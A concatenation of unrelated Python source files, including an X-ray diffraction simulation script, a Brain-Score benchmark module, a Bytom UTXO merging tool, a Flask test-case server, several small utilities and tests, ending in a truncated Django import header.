SIM.Fhkl = Fhkl
SIM.Fbg_vs_stol = Fbg_vs_stol
print(SIM.Fbg_vs_stol[1])
SIM.Fbg_vs_stol[1]=(0,0)
print(SIM.Fbg_vs_stol[1])
SIM.Fbg_vs_stol[1]=(0,0)
print(SIM.Fbg_vs_stol[1])
#from IPython import embed
#embed()
blarg = SIM.Fbg_vs_stol
blarg[1] = (0,0)
SIM.Fbg_vs_stol = blarg
print(SIM.Fbg_vs_stol[1])
# sigh, just keep going...
#exit()
print("beam_center_mm=",SIM.beam_center_mm)
print("XDS_ORGXY=",SIM.XDS_ORGXY)
print("detector_pivot=",SIM.detector_pivot)
print("beamcenter_convention=",SIM.beamcenter_convention)
print("fdet_vector=",SIM.fdet_vector)
print("sdet_vector=",SIM.sdet_vector)
print("odet_vector=",SIM.odet_vector)
print("beam_vector=",SIM.beam_vector)
print("polar_vector=",SIM.polar_vector)
print("spindle_axis=",SIM.spindle_axis)
print("twotheta_axis=",SIM.twotheta_axis)
print("distance_meters=",SIM.distance_meters)
print("distance_mm=",SIM.distance_mm)
print("close_distance_mm=",SIM.close_distance_mm)
print("detector_twotheta_deg=",SIM.detector_twotheta_deg)
print("detsize_fastslow_mm=",SIM.detsize_fastslow_mm)
print("detpixels_fastslow=",SIM.detpixels_fastslow)
print("detector_rot_deg=",SIM.detector_rot_deg)
print("curved_detector=",SIM.curved_detector)
print("pixel_size_mm=",SIM.pixel_size_mm)
print("point_pixel=",SIM.point_pixel)
print("polarization=",SIM.polarization)
print("nopolar=",SIM.nopolar)
print("oversample=",SIM.oversample)
print("region_of_interest=",SIM.region_of_interest)
print("wavelength_A=",SIM.wavelength_A)
print("energy_eV=",SIM.energy_eV)
print("fluence=",SIM.fluence)
print("flux=",SIM.flux)
print("exposure_s=",SIM.exposure_s)
print("beamsize_mm=",SIM.beamsize_mm)
print("dispersion_pct=",SIM.dispersion_pct)
print("dispsteps=",SIM.dispsteps)
print("divergence_hv_mrad=",SIM.divergence_hv_mrad)
print("divsteps_hv=",SIM.divsteps_hv)
print("divstep_hv_mrad=",SIM.divstep_hv_mrad)
print("round_div=",SIM.round_div)
print("phi_deg=",SIM.phi_deg)
print("osc_deg=",SIM.osc_deg)
print("phisteps=",SIM.phisteps)
print("phistep_deg=",SIM.phistep_deg)
print("detector_thick_mm=",SIM.detector_thick_mm)
print("detector_thicksteps=",SIM.detector_thicksteps)
print("detector_thickstep_mm=",SIM.detector_thickstep_mm)
print("mosaic_spread_deg=",SIM.mosaic_spread_deg)
print("mosaic_domains=",SIM.mosaic_domains)
print("indices=",SIM.indices)
print("amplitudes=",SIM.amplitudes)
print("Fhkl_tuple=",SIM.Fhkl_tuple)
print("default_F=",SIM.default_F)
print("interpolate=",SIM.interpolate)
print("integral_form=",SIM.integral_form)
# modify things that are missing, or not quite right in the header
SIM.close_distance_mm=299.83
SIM.wavelength_A=1.304735
SIM.polarization=0.99
SIM.beamsize_mm=0.03
#SIM.fluence=4.28889e+18
# fluence scaled to make crystal look bigger
SIM.fluence=1.03e+27
SIM.beamcenter_convention=convention.Custom
SIM.beam_center_mm=( 160.53, 182.31 )
SIM.dispersion_pct = 0.5
SIM.dispsteps=6
print("dispsteps=",SIM.dispsteps)
SIM.divergence_hv_mrad = ( 0.02, 0.02 )
SIM.divsteps_hv = ( 2 , 2 )
print(SIM.divsteps_hv)
SIM.round_div=True
print(SIM.divsteps_hv)
#SIM.detector_thick_mm = 0.037
SIM.detector_thick_mm = 0.
SIM.detector_thicksteps = 1
# override mtz unit cell
SIM.unit_cell_tuple = ( 68.78, 169.26, 287.42, 90, 90, 90 )
#SIM.Ncells_abc = ( 1, 1, 1 )
SIM.Ncells_abc = ( 14, 6, 4 )
#SIM.Ncells_abc = ( 35, 15, 10 )
print("Ncells_abc=",SIM.Ncells_abc)
SIM.xtal_shape=shapetype.Tophat
print("xtal_size_mm=",SIM.xtal_size_mm)
SIM.interpolate=0
SIM.progress_meter=True
SIM.mosaic_spread_deg = 0.2
SIM.mosaic_domains = 30
SIM.oversample = 1
SIM.detector_psf_type=shapetype.Fiber
SIM.adc_offset_adu = 10
SIM.readout_noise_adu = 1.5
SIM.show_sources()
# speedups, comment out for realism
if GOFAST:
SIM.divergence_hv_mrad = ( 0,0 )
SIM.dispersion_pct = 0
SIM.mosaic_spread_deg = 0
# set this to 0 or -1 to trigger automatic radius. could be very slow with bright images
SIM.detector_psf_kernel_radius_pixels=5;
# use one pixel for diagnostics?
SIM.printout_pixel_fastslow=(1782,1832)
# debug only a little patch
#SIM.region_of_interest=((1450,1850),(1550,1950))
SIM.amorphous_sample_thick_mm = 0.1
SIM.amorphous_density_gcm3 = 7e-7
SIM.amorphous_sample_molecular_weight_Da = 18 # default
# load in the real image so we can extract the background
SIM.raw_pixels = img.get_raw_data().as_double()
#print SIM.Fbg_vs_stol[100]
SIM.extract_background()
#print SIM.Fbg_vs_stol[100]
# maybe edit background trace here?
# or, forget it, reset to old one:
SIM.Fbg_vs_stol = Fbg_vs_stol
# now clear the pixels
SIM.raw_pixels*=0;
print("dispsteps=",SIM.dispsteps)
print("divsteps=",SIM.divsteps_hv)
print("oversample=",SIM.oversample)
SIM.add_background(oversample=1,source=0)
print("mid_sample=",SIM.raw_pixels[1782,1832])
print("dispsteps=",SIM.dispsteps)
print("divsteps=",SIM.divsteps_hv)
print("oversample=",SIM.oversample)
SIM.to_smv_format(fileout="intimage_001.img",intfile_scale=1)
# three clusters of mosaic domains
if GOFAST == False:
SIM.fluence /= 3
SIM.missets_deg = ( 96.9473, -52.0932, -32.518 )
#SIM.missets_deg = ( 96.544, -51.9673, -32.4243 )
SIM.add_nanoBragg_spots()
SIM.to_smv_format(fileout="intimage_002.img",intfile_scale=1)
SIM.missets_deg = ( 97.5182, -52.3404, -32.7289 )
SIM.add_nanoBragg_spots()
SIM.to_smv_format(fileout="intimage_003.img",intfile_scale=1)
SIM.missets_deg = ( 97.1251, -52.2242, -32.751 )
SIM.add_nanoBragg_spots()
SIM.to_smv_format(fileout="intimage_004.img",intfile_scale=1)
SIM.detector_psf_fwhm_mm=0.08;
SIM.detector_psf_type=shapetype.Fiber
# get same noise each time this test is run
SIM.seed = 1
print("seed=",SIM.seed)
print("calib_seed=",SIM.calib_seed)
print("quantum_gain=",SIM.quantum_gain)
print("adc_offset_adu=",SIM.adc_offset_adu)
print("detector_calibration_noise_pct=",SIM.detector_calibration_noise_pct)
print("flicker_noise_pct=",SIM.flicker_noise_pct)
print("readout_noise_adu=",SIM.readout_noise_adu)
print("detector_psf_type=",SIM.detector_psf_type)
print("detector_psf_fwhm_mm=",SIM.detector_psf_fwhm_mm)
print("detector_psf_kernel_radius_pixels=",SIM.detector_psf_kernel_radius_pixels)
SIM.show_params()
SIM.add_noise()
print("raw_pixels=",SIM.raw_pixels)
SIM.to_smv_format(fileout="noiseimage_001.img",intfile_scale=1)
print("mosaic_domains=",SIM.mosaic_domains)
print("mosaic_spread_deg=",SIM.mosaic_spread_deg)
print("dispersion_pct=",SIM.dispersion_pct)
print("dispsteps=",SIM.dispsteps)
print("divergence_hv_mrad=",SIM.divergence_hv_mrad)
print("divergence_hv=",SIM.divsteps_hv)
print("GOT HERE 1")
SIM.verbose=999
SIM.free_all()
print("GOT HERE 2")
|
nilq/baby-python
|
python
|
import brainscore
from brainscore.benchmarks._neural_common import NeuralBenchmark, average_repetition
from brainscore.metrics.ceiling import InternalConsistency, RDMConsistency
from brainscore.metrics.rdm import RDMCrossValidated
from brainscore.metrics.regression import CrossRegressedCorrelation, pls_regression, pearsonr_correlation, \
single_regression
from brainscore.utils import LazyLoad
from result_caching import store
VISUAL_DEGREES = 4
NUMBER_OF_TRIALS = 20
def _MovshonFreemanZiemba2013Region(region, identifier_metric_suffix, similarity_metric, ceiler):
assembly_repetition = LazyLoad(lambda region=region: load_assembly(False, region=region))
assembly = LazyLoad(lambda region=region: load_assembly(True, region=region))
return NeuralBenchmark(identifier=f'movshon.FreemanZiemba2013.{region}-{identifier_metric_suffix}', version=2,
assembly=assembly, similarity_metric=similarity_metric, parent=region,
ceiling_func=lambda: ceiler(assembly_repetition),
visual_degrees=VISUAL_DEGREES, number_of_trials=NUMBER_OF_TRIALS,
paper_link='https://www.nature.com/articles/nn.3402')
def MovshonFreemanZiemba2013V1PLS():
return _MovshonFreemanZiemba2013Region('V1', identifier_metric_suffix='pls',
similarity_metric=CrossRegressedCorrelation(
regression=pls_regression(), correlation=pearsonr_correlation(),
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=InternalConsistency())
def MovshonFreemanZiemba2013V1Single():
return _MovshonFreemanZiemba2013Region('V1', identifier_metric_suffix='single',
similarity_metric=CrossRegressedCorrelation(
regression=single_regression(), correlation=pearsonr_correlation(),
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=InternalConsistency())
def MovshonFreemanZiemba2013V1RDM():
return _MovshonFreemanZiemba2013Region('V1', identifier_metric_suffix='rdm',
similarity_metric=RDMCrossValidated(
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=RDMConsistency())
def MovshonFreemanZiemba2013V2PLS():
return _MovshonFreemanZiemba2013Region('V2', identifier_metric_suffix='pls',
similarity_metric=CrossRegressedCorrelation(
regression=pls_regression(), correlation=pearsonr_correlation(),
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=InternalConsistency())
def MovshonFreemanZiemba2013V2RDM():
return _MovshonFreemanZiemba2013Region('V2', identifier_metric_suffix='rdm',
similarity_metric=RDMCrossValidated(
crossvalidation_kwargs=dict(stratification_coord='texture_type')),
ceiler=RDMConsistency())
@store()
def load_assembly(average_repetitions, region, access='private'):
assembly = brainscore.get_assembly(f'movshon.FreemanZiemba2013.{access}')
assembly = assembly.sel(region=region)
assembly = assembly.stack(neuroid=['neuroid_id']) # work around xarray multiindex issues
assembly['region'] = 'neuroid', [region] * len(assembly['neuroid'])
assembly.load()
time_window = (50, 200)
assembly = assembly.sel(time_bin=[(t, t + 1) for t in range(*time_window)])
assembly = assembly.mean(dim='time_bin', keep_attrs=True)
assembly = assembly.expand_dims('time_bin_start').expand_dims('time_bin_end')
assembly['time_bin_start'], assembly['time_bin_end'] = [time_window[0]], [time_window[1]]
assembly = assembly.stack(time_bin=['time_bin_start', 'time_bin_end'])
assembly = assembly.squeeze('time_bin')
assembly = assembly.transpose('presentation', 'neuroid')
if average_repetitions:
assembly = average_repetition(assembly)
return assembly
|
nilq/baby-python
|
python
|
import json, time, argparse, getpass, re, requests
try:
input = raw_input
except NameError:
pass
parser = argparse.ArgumentParser(description='Bytom UTXO Tool')
parser.add_argument('-o', '--url', default='http://127.0.0.1:9888', dest='endpoint', help='API endpoint')
parser.add_argument('--http-user', default=None, dest='http_user', help='HTTP Basic Auth Username')
parser.add_argument('--http-pass', default=None, dest='http_pass', help='HTTP Basic Auth Password')
parser.add_argument('--cert', default=None, dest='https_cert', help='HTTPS Client Certificate')
parser.add_argument('--key', default=None, dest='https_key', help='HTTPS Client Key')
parser.add_argument('--ca', default=None, dest='https_ca', help='HTTPS CA Certificate')
parser.add_argument('--no-verify', action='store_true', dest='https_verify', help='Do not verify HTTPS server certificate')
parser.add_argument('-p', '--pass', default=None, dest='bytom_pass', help='Bytom Account Password')
parser.add_argument('-l', '--list', action='store_true', dest='only_list', help='Show UTXO list without merge')
parser.add_argument('-m', '--merge', default=None, dest='merge_list', help='UTXO to merge')
parser.add_argument('-a', '--address', default=None, dest='address', help='Transfer address')
parser.add_argument('-y', '--yes', action='store_true', dest='confirm', help='Confirm transfer')
class BytomException(Exception):
pass
class JSONRPCException(Exception):
pass
class Callable(object):
def __init__(self, name, func):
self.name = name
self.func = func
def __call__(self, *args, **kwargs):
return self.func(self.name, *args, **kwargs)
class JSONRPC(object):
def __init__(self, endpoint, httpverb='POST', **kwargs):
self.url = endpoint.rstrip('/')
self.httpverb = httpverb
self.kwargs = kwargs
def __getattr__(self, name):
return Callable(name.replace('_', '-'), self.callMethod)
def callMethod(self, method, params={}):
m = requests.request(self.httpverb, '{}/{}'.format(self.url, method), json=params, **self.kwargs)
data = m.json()
if data.get('status') == 'success':
return data['data']
raise JSONRPCException(data.get('msg') or data.get('message') or str(data))
def send_tx(bytomd, utxo_list, to_address, password):
actions = []
amount = 0
for utxo in utxo_list:
actions.append({
'type': 'spend_account_unspent_output',
'output_id': utxo['id'],
})
amount += utxo['amount']
actions.append({
'amount': amount,
'asset_id': 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff',
'type': 'control_address',
'address': to_address,
})
transaction = bytomd.build_transaction({
'base_transaction' : None,
'actions' : actions,
'ttl' : 1
})
gas_info = bytomd.estimate_transaction_gas({
'transaction_template': transaction
})
fee = gas_info['total_neu']
actions[-1]['amount'] -= fee
time.sleep(1)
transaction = bytomd.build_transaction({
'base_transaction': None,
'actions': actions,
'ttl': 1,
})
signed_transaction = bytomd.sign_transaction({
'transaction': transaction,
'password': password,
})
if signed_transaction['sign_complete']:
raw_transaction = signed_transaction['transaction']['raw_transaction']
result = bytomd.submit_transaction({'raw_transaction': raw_transaction})
return result['tx_id']
else:
raise BytomException('Sign not complete')
def parse_id_list(id_list_str, list_all):
for id_str in id_list_str.split(','):
id_ = id_str.strip()
if not id_:
pass
elif id_.strip().lower() == 'all':
for i in list_all:
yield i
return
elif re.match('(\d+)-(\d+)', id_):
start, end = re.match('(\d+)-(\d+)', id_).groups()
for i in range(int(start), int(end) + 1):
yield i
elif not id_.strip().isdigit():
print('Ignored: Incorrect index {}'.format(id_))
else:
idx = int(id_.strip())
yield idx
def main():
options = parser.parse_args()
api_params = {}
if options.http_user and options.http_pass:
api_params['auth'] = (options.http_user, options.http_pass)
if options.https_cert:
if options.https_key:
api_params['cert'] = (options.https_cert, options.https_key)
else:
api_params['cert'] = options.https_cert
if options.https_ca:
api_params['verify'] = options.https_ca
elif options.https_verify:
api_params['verify'] = False
bytomd = JSONRPC(options.endpoint, **api_params)
utxolist = bytomd.list_unspent_outputs()
current_block = bytomd.get_block_count()['block_count']
for i, utxo in enumerate(utxolist):
print('{:4}. {:13.8f} BTM {}{}'.format(i, utxo['amount'] / 1e8, utxo['id'], ' (not mature)' if utxo['valid_height'] > current_block else ''))
if options.only_list:
return
utxo_idlist = options.merge_list or input('Merge UTXOs (1,3,5 or 1-10 or all): ')
utxo_mergelist = []
utxo_idset = set()
for idx in parse_id_list(utxo_idlist, range(len(utxolist))):
if idx in utxo_idset:
print('Ignored: Duplicate index {}'.format(idx))
elif not 0 <= idx < len(utxolist):
print('Ignored: Index out of range {}'.format(idx))
elif utxolist[idx]['valid_height'] > current_block:
print('Ignored: UTXO[{}] not mature'.format(idx))
else:
utxo_mergelist.append(utxolist[idx])
utxo_idset.add(idx)
if len(utxo_mergelist) < 2:
print('Not Merge UTXOs, Exit...')
return
print('To merge {} UTXOs with {:13.8f} BTM'.format(len(utxo_mergelist), sum(utxo['amount'] for utxo in utxo_mergelist) / 1e8))
if not options.address:
options.address = input('Transfer Address: ')
if not options.bytom_pass:
options.bytom_pass = getpass.getpass('Bytom Account Password: ')
if not (options.confirm or input('Confirm [y/N] ').lower() == 'y'):
print('Not Merge UTXOs, Exit...')
return
print(send_tx(bytomd, utxo_mergelist, options.address, options.bytom_pass))
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
S = set()
S.add(5)
S.add(3)
S.add(1)
# Prints out the numbers 5, 3, 1 in no particular order
for element in S:
print "{} is in the set".format(element)
S.remove(3)
S.remove(5)
s.remove(1)
|
nilq/baby-python
|
python
|
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module serving all the traffic for javascript test cases."""
import os
from flask import abort
from flask import Blueprint
from flask import make_response
from flask import render_template
from flask import Response
from flask import send_from_directory
from flask import url_for
javascript_module = Blueprint(
"javascript_module", __name__, template_folder="templates")
# Global app.instance_path is not accessible from blueprints ¯\_(ツ)_/¯.
TEST_CASES_PATH = os.path.abspath(__file__ + "/../../../test-cases/javascript/")
@javascript_module.route("/misc/comment.js")
def comment():
content = "// " + url_for(
"index", _external=True) + "test/javascript/misc/comment.found"
r = make_response(content, 200)
r.headers["Content-Type"] = "application/javascript"
return r
@javascript_module.route("/misc/string-variable.js")
def string_variable():
content = "var url = \"" + url_for(
"index", _external=True) + "test/javascript/misc/string-variable.found\";"
r = make_response(content, 200)
r.headers["Content-Type"] = "application/javascript"
return r
@javascript_module.route("/frameworks/angular/")
def angular_root():
# Redirect straight to the Angular app entry point.
r = Response(status=301)
r.headers["Location"] = "/javascript/frameworks/angular/index.html"
return r
@javascript_module.route("/frameworks/polymer/")
def polymer_root():
# Redirect straight to the Polymer app entry point.
r = Response(status=301)
r.headers["Location"] = "/javascript/frameworks/polymer/index.html"
return r
@javascript_module.route("/frameworks/react/")
def react_root():
# Redirect straight to the React app entry point.
r = Response(status=301)
r.headers["Location"] = "/javascript/frameworks/react/index.html"
return r
@javascript_module.route("/misc/string-concat-variable.js")
def string_concat_variable():
content = "var domain = \"" + url_for(
"index", _external=True
) + ("\";var path = \"test/javascript/misc/string-concat-variable.found\";var"
" full = domain + path;")
r = make_response(content, 200)
r.headers["Content-Type"] = "application/javascript"
return r
@javascript_module.route("/", defaults={"path": ""})
@javascript_module.route("/<path:path>")
def html_dir(path):
"""Lists contents of requested directory."""
requested_path = os.path.join(TEST_CASES_PATH, path)
if not os.path.exists(requested_path):
return abort(404)
if os.path.isdir(requested_path):
files = os.listdir(requested_path)
return render_template("list-javascript-dir.html", files=files, path=path)
if os.path.isfile(requested_path):
return send_from_directory("test-cases/javascript", path)
|
nilq/baby-python
|
python
|
import sqlite3
import os.path
from os import listdir, getcwd
import sys
from os import listdir
from os.path import isfile, join
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
db_dir = os.path.join(BASE_DIR,"sql/")
img_dir = os.path.join(BASE_DIR,"images/")
full_dir = lambda x,y: x+y
known_faces_imgs = full_dir(img_dir,'known_faces/')
new_faces_imgs = full_dir(img_dir,'new_faces/')
imgs1 = [f for f in listdir(known_faces_imgs) if isfile(join(known_faces_imgs, f))]
imgs2 = [f for f in listdir(new_faces_imgs) if isfile(join(new_faces_imgs, f))]
#telechargi 2 images pour tester
'''
import urllib.request
def store_image(url, local_file_name):
with urllib.request.urlopen(url) as resource:
with open(local_file_name, 'wb') as f:
f.write(resource.read())
store_image('https://upload.wikimedia.org/wikipedia/commons/2/25/Chris_Evans_SDCC_2014.jpg',
'1.jpg')
store_image('https://img.buzzfeed.com/buzzfeed-static/static/2018-01/11/18/campaign_images/buzzfeed-prod-fastlane-01/chris-evans-uses-nothing-on-his-beard-its-just-th-2-20079-1515714803-5_dblbig.jpg',
'2.jpg')
'''
def codb(db_file):
db_file = full_dir(db_dir,db_file)
print(db_file)
db_is_new = not os.path.exists(db_file)
conn = sqlite3.connect(db_file)
if db_is_new:
print (db_file,"DONE")
sql = "create table if not exists elements ("
sql +="ID INTEGER PRIMARY KEY AUTOINCREMENT,"
sql+="IMAGE BLOB,TYPE TEXT,NOM TEXT);"
conn.execute(sql)
else:
print ("Schema exists")
print
return conn
def insert_picture(db,imgs):
conn = codb(db)
for i in imgs:
picture_file=full_dir(full_dir(img_dir,db+"/"),i)
with open(picture_file, 'rb') as input_file:
ablob = input_file.read()
base=os.path.basename(picture_file)
afile, ext = os.path.splitext(base)
sql = "INSERT INTO elements"
sql+="(IMAGE, TYPE,NOM) VALUES(?, ?,?);"
conn.execute(sql,[sqlite3.Binary(ablob), ext, afile])
conn.commit()
conn.close()
def make_new():
#db1
insert_picture('known_faces',imgs1)
#db2
insert_picture('new_faces',imgs2)
|
nilq/baby-python
|
python
|
data = open('data/input6.txt', 'r')
orbs = data.readlines()
d = {}
for orb in orbs:
c1 = orb[:3]
c2 = orb[4:7]
d[c2] = c1
s = 0
for p in d:
curr_p = p
while curr_p in d:
curr_p = d[curr_p]
s += 1
print(s)
trajet_you = []
curr = 'YOU'
while True:
if curr not in d: break
curr = d[curr]
trajet_you += [curr]
i = 0
curr = 'SAN'
while True:
i += 1
curr = d[curr]
if curr in trajet_you:break
print(trajet_you.index(curr) + i - 1)
|
nilq/baby-python
|
python
|
#! /usr/bin/env python
#
# Check the option usage.
# Make sure the union member matches the option type.
#
import sys, os, fnmatch
# just use the first letter of the member name - should be unique
opt_suffix = {
'b' : 'AT_BOOL',
'a' : 'AT_IARF',
'n' : 'AT_NUM',
'l' : 'AT_LINE',
't' : 'AT_POS'
}
opts = { }
def check_file (fn):
problems = 0
fd = open(fn, 'r')
line_no = 0
for line in fd:
line_no = line_no + 1
cpd = line.find('cpd.settings[UO_')
if cpd > 0:
sb = line[cpd:].find(']')
opt = line[cpd + 13 : cpd + sb]
mem = line[cpd + sb + 2]
if opt in opts and mem in opt_suffix:
if opts[opt] != opt_suffix[mem]:
print fn + '[%d]' % (line_no) , opt, 'should use', opts[opt], 'not', opt_suffix[mem]
problems += 1
return problems
def main (argv):
# Read in all the options
of = open(os.path.join('src', 'options.cpp'), 'r');
for line in of:
if line.find('unc_add_option') > 0 and line.find('UO_') > 0:
ps = line.split(',')
if len(ps) >= 3:
opts[ps[1].strip()] = ps[2].strip()
of.close()
# Get a list of all the source files
ld = os.listdir('src')
src_files = fnmatch.filter(ld, '*.cpp')
src_files.extend(fnmatch.filter(ld, '*.h'))
# Check each source file
problems = 0
for fn in src_files:
problems += check_file(os.path.join('src', fn))
if problems == 0:
print 'No problems found'
if __name__ == '__main__':
main(sys.argv)
|
nilq/baby-python
|
python
|
from pathlib import Path
import pytest
from md_translate.exceptions import ObjectNotFoundException, FileIsNotMarkdown
from md_translate.files_worker import FilesWorker
TEST_FIRST_FILE = 'tests/test_data/md_files_folder/first_file.md'
TEST_SECOND_FILE = 'tests/test_data/md_files_folder/second_file.md'
class SettingsMock:
def __init__(self, path):
self.path = Path('tests/test_data').joinpath(path)
class TestFilesWorker:
@pytest.mark.parametrize('path, err', [
['not existing folder', ObjectNotFoundException],
['folder_without_md_files', FileNotFoundError],
['not_a_folder', FileIsNotMarkdown],
['not_markdown_file.txt', FileIsNotMarkdown],
])
def test_folder_errors(self, path, err):
with pytest.raises(err):
FilesWorker(SettingsMock(path)).get_md_files()
def test_multiple_objects(self):
file_worker_object = FilesWorker(SettingsMock('md_files_folder'))
assert file_worker_object.single_file == False
assert sorted(file_worker_object.get_md_files()) == [Path(TEST_FIRST_FILE), Path(TEST_SECOND_FILE)]
def test_single_object(self):
file_worker_object = FilesWorker(SettingsMock('md_files_folder/first_file.md'))
assert file_worker_object.single_file == True
assert file_worker_object.get_md_files() == [Path(TEST_FIRST_FILE)]
|
nilq/baby-python
|
python
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.page import page as page_module
from telemetry.page import page_set as page_set_module
class Top20Page(page_module.Page):
def __init__(self, url, page_set, name=''):
super(Top20Page, self).__init__(url=url, page_set=page_set, name=name)
self.archive_data_file = '../data/chrome_proxy_top_20.json'
class Top20PageSet(page_set_module.PageSet):
""" Pages hand-picked for Chrome Proxy tests. """
def __init__(self):
super(Top20PageSet, self).__init__(
archive_data_file='../data/chrome_proxy_top_20.json')
# Why: top google property; a google tab is often open
self.AddPage(Top20Page('https://www.google.com/#hl=en&q=barack+obama',
self))
# Why: #3 (Alexa global)
self.AddPage(Top20Page('http://www.youtube.com', self))
# Why: #18 (Alexa global), Picked an interesting post
self.AddPage(Top20Page(
# pylint: disable=C0301
'http://en.blog.wordpress.com/2012/09/04/freshly-pressed-editors-picks-for-august-2012/',
self, 'Wordpress'))
# Why: top social,Public profile
self.AddPage(Top20Page('http://www.facebook.com/barackobama', self,
'Facebook'))
# Why: #12 (Alexa global),Public profile
self.AddPage(Top20Page('http://www.linkedin.com/in/linustorvalds', self,
'LinkedIn'))
# Why: #6 (Alexa) most visited worldwide,Picked an interesting page
self.AddPage(Top20Page('http://en.wikipedia.org/wiki/Wikipedia', self,
'Wikipedia (1 tab)'))
# Why: #8 (Alexa global),Picked an interesting page
self.AddPage(Top20Page('https://twitter.com/katyperry', self, 'Twitter'))
# Why: #37 (Alexa global)
self.AddPage(Top20Page('http://pinterest.com', self, 'Pinterest'))
# Why: #1 sports
self.AddPage(Top20Page('http://espn.go.com', self, 'ESPN'))
# Why: #1 news worldwide (Alexa global)
self.AddPage(Top20Page('http://news.yahoo.com', self))
# Why: #2 news worldwide
self.AddPage(Top20Page('http://www.cnn.com', self))
# Why: #7 (Alexa news); #27 total time spent,Picked interesting page
self.AddPage(Top20Page(
'http://www.weather.com/weather/right-now/Mountain+View+CA+94043',
self, 'Weather.com'))
# Why: #1 world commerce website by visits; #3 commerce in the US by time
# spent
self.AddPage(Top20Page('http://www.amazon.com', self))
# Why: #1 commerce website by time spent by users in US
self.AddPage(Top20Page('http://www.ebay.com', self))
# Why: #1 games according to Alexa (with actual games in it)
self.AddPage(Top20Page('http://games.yahoo.com', self))
# Why: #1 Alexa recreation
self.AddPage(Top20Page('http://booking.com', self))
# Why: #1 Alexa reference
self.AddPage(Top20Page('http://answers.yahoo.com', self))
# Why: #1 Alexa sports
self.AddPage(Top20Page('http://sports.yahoo.com/', self))
# Why: top tech blog
self.AddPage(Top20Page('http://techcrunch.com', self))
self.AddPage(Top20Page('http://www.nytimes.com', self))
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
##
# @file backend.py
# @brief
# @author wondereamer
# @version 0.5
# @date 2016-07-10
from quantity.digger.event.rpc import EventRPCServer
from quantity.digger.event.eventengine import ZMQEventEngine
from quantity.digger.interaction.interface import BackendInterface
from quantity.digger.util import mlogger as log
from quantity.digger.datasource.data import DataManager
from quantity.digger.datastruct import PContract
from quantity.digger.interaction.serialize import (
serialize_pcontract_bars,
serialize_all_pcontracts,
serialize_all_contracts,
)
class Backend(BackendInterface):
## @TODO singleton
SERVER_FOR_UI = 'backend4ui'
SERVER_FOR_SHELL = "backend4shell"
def __init__(self):
log.info("Init Backend..")
self._engine = ZMQEventEngine('Backend')
self._engine.start()
self._shell_srv = EventRPCServer(self._engine,
self.SERVER_FOR_SHELL)
self._ui_srv = EventRPCServer(self._engine,
self.SERVER_FOR_UI)
self.register_functions(self._shell_srv)
self.register_functions(self._ui_srv)
def register_functions(self, server):
server.register('get_all_contracts', self.get_all_contracts)
server.register('get_all_pcontracts', self.get_all_pcontracts)
server.register('get_pcontract', self.get_pcontract)
server.register('get_strategies', self.get_strategies)
server.register('run_strategy', self.run_strategy)
server.register('run_technical', self.run_technical)
def stop(self):
log.info('Backend stopped.')
self._engine.stop()
def get_all_contracts(self):
# 模拟接口
data = ['CC.SHFE-1.MINUTE', 'BB.SHFE-1.MINUTE']
pcons = [PContract.from_string(d) for d in data]
contracts = [pcon.contract for pcon in pcons]
return serialize_all_contracts(contracts)
def get_all_pcontracts(self):
# 模拟接口
data = ['CC.SHFE-1.MINUTE', 'BB.SHFE-1.MINUTE']
pcontracts = [PContract.from_string(d) for d in data]
return serialize_all_pcontracts(pcontracts)
def get_pcontract(self, str_pcontract):
dm = DataManager()
da = dm.get_bars(str_pcontract)
return serialize_pcontract_bars(str_pcontract, da.data)
def run_strategy(self, name):
""""""
return
def run_technical(self, name):
return
def get_technicals(self):
""" 获取系统的所有指标。 """
from quantity.digger.technicals import get_techs
return get_techs()
def get_strategies(self):
return 'hello'
#backend.get_all_contracts()
#backend.get_pcontract('BB.TEST-1.MINUTE')
if __name__ == '__main__':
backend = Backend()
import time, sys
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
backend.stop()
sys.exit(0)
|
nilq/baby-python
|
python
|
#%% Test Module
from pyCMC import CMC
def test_results(returnVal, tname):
if 'status' in returnVal.keys():
if returnVal['status']['error_code'] == 0:
print('{} works!'.format(tname))
else:
print('Error message: {}'.format(returnVal['status']['error_message']))
else:
print(returnVal)
with open('./cmc_key.key', 'r') as f:
cmc_key = f.readline().strip()
cmc = CMC(cmc_key)
# Map
map_data = cmc.map()
test_results(map_data, 'Map')
# Metadata
meta_data = cmc.metadata(slug='bitcoin,ethereum,litecoin')
test_results(meta_data, 'Metadata')
# Listings
listings = cmc.listings(start=1, limit=5, convert='EUR', convert_id=None, sort='market_cap')
test_results(listings, 'Listings')
# Quotes
quotes = cmc.quotes(coinId=None, slug='ethereum')
test_results(quotes, 'Quotes')
# Global Metrics
metrics = cmc.global_metrics()
test_results(metrics, 'Metrics')
# Convert Price
convert = cmc.convert_price(2, coinId=None, symbol='ETH', convert='USD')
test_results(convert, 'Convert')
# These should return errors before calling the API
print('\nThe remaining functions should all return errors.\n')
# Listings
err_listings = cmc.listings(start=1, limit='10', convert='EUR', convert_id=None, sort='market_cap')
test_results(err_listings, 'Error Listings')
# Quotes
err_quotes = cmc.quotes(coinId=None, slug=None)
test_results(err_quotes, 'Error Quotes')
# Convert Price
err_convert = cmc.convert_price(1.5e9, coinId=None, symbol='ETH', convert='USD')
test_results(err_convert, 'Convert')
|
nilq/baby-python
|
python
|
from django.http import HttpResponse, HttpRequest, HttpResponseRedirect
from django.template import RequestContext
from django.shortcuts import render_to_response
from django.core.context_processors import csrf
from django.conf import settings
from django.contrib.auth.models import User, Group
from reports.models import BusinessUnit, Machine
from guardian.shortcuts import get_objects_for_user
try:
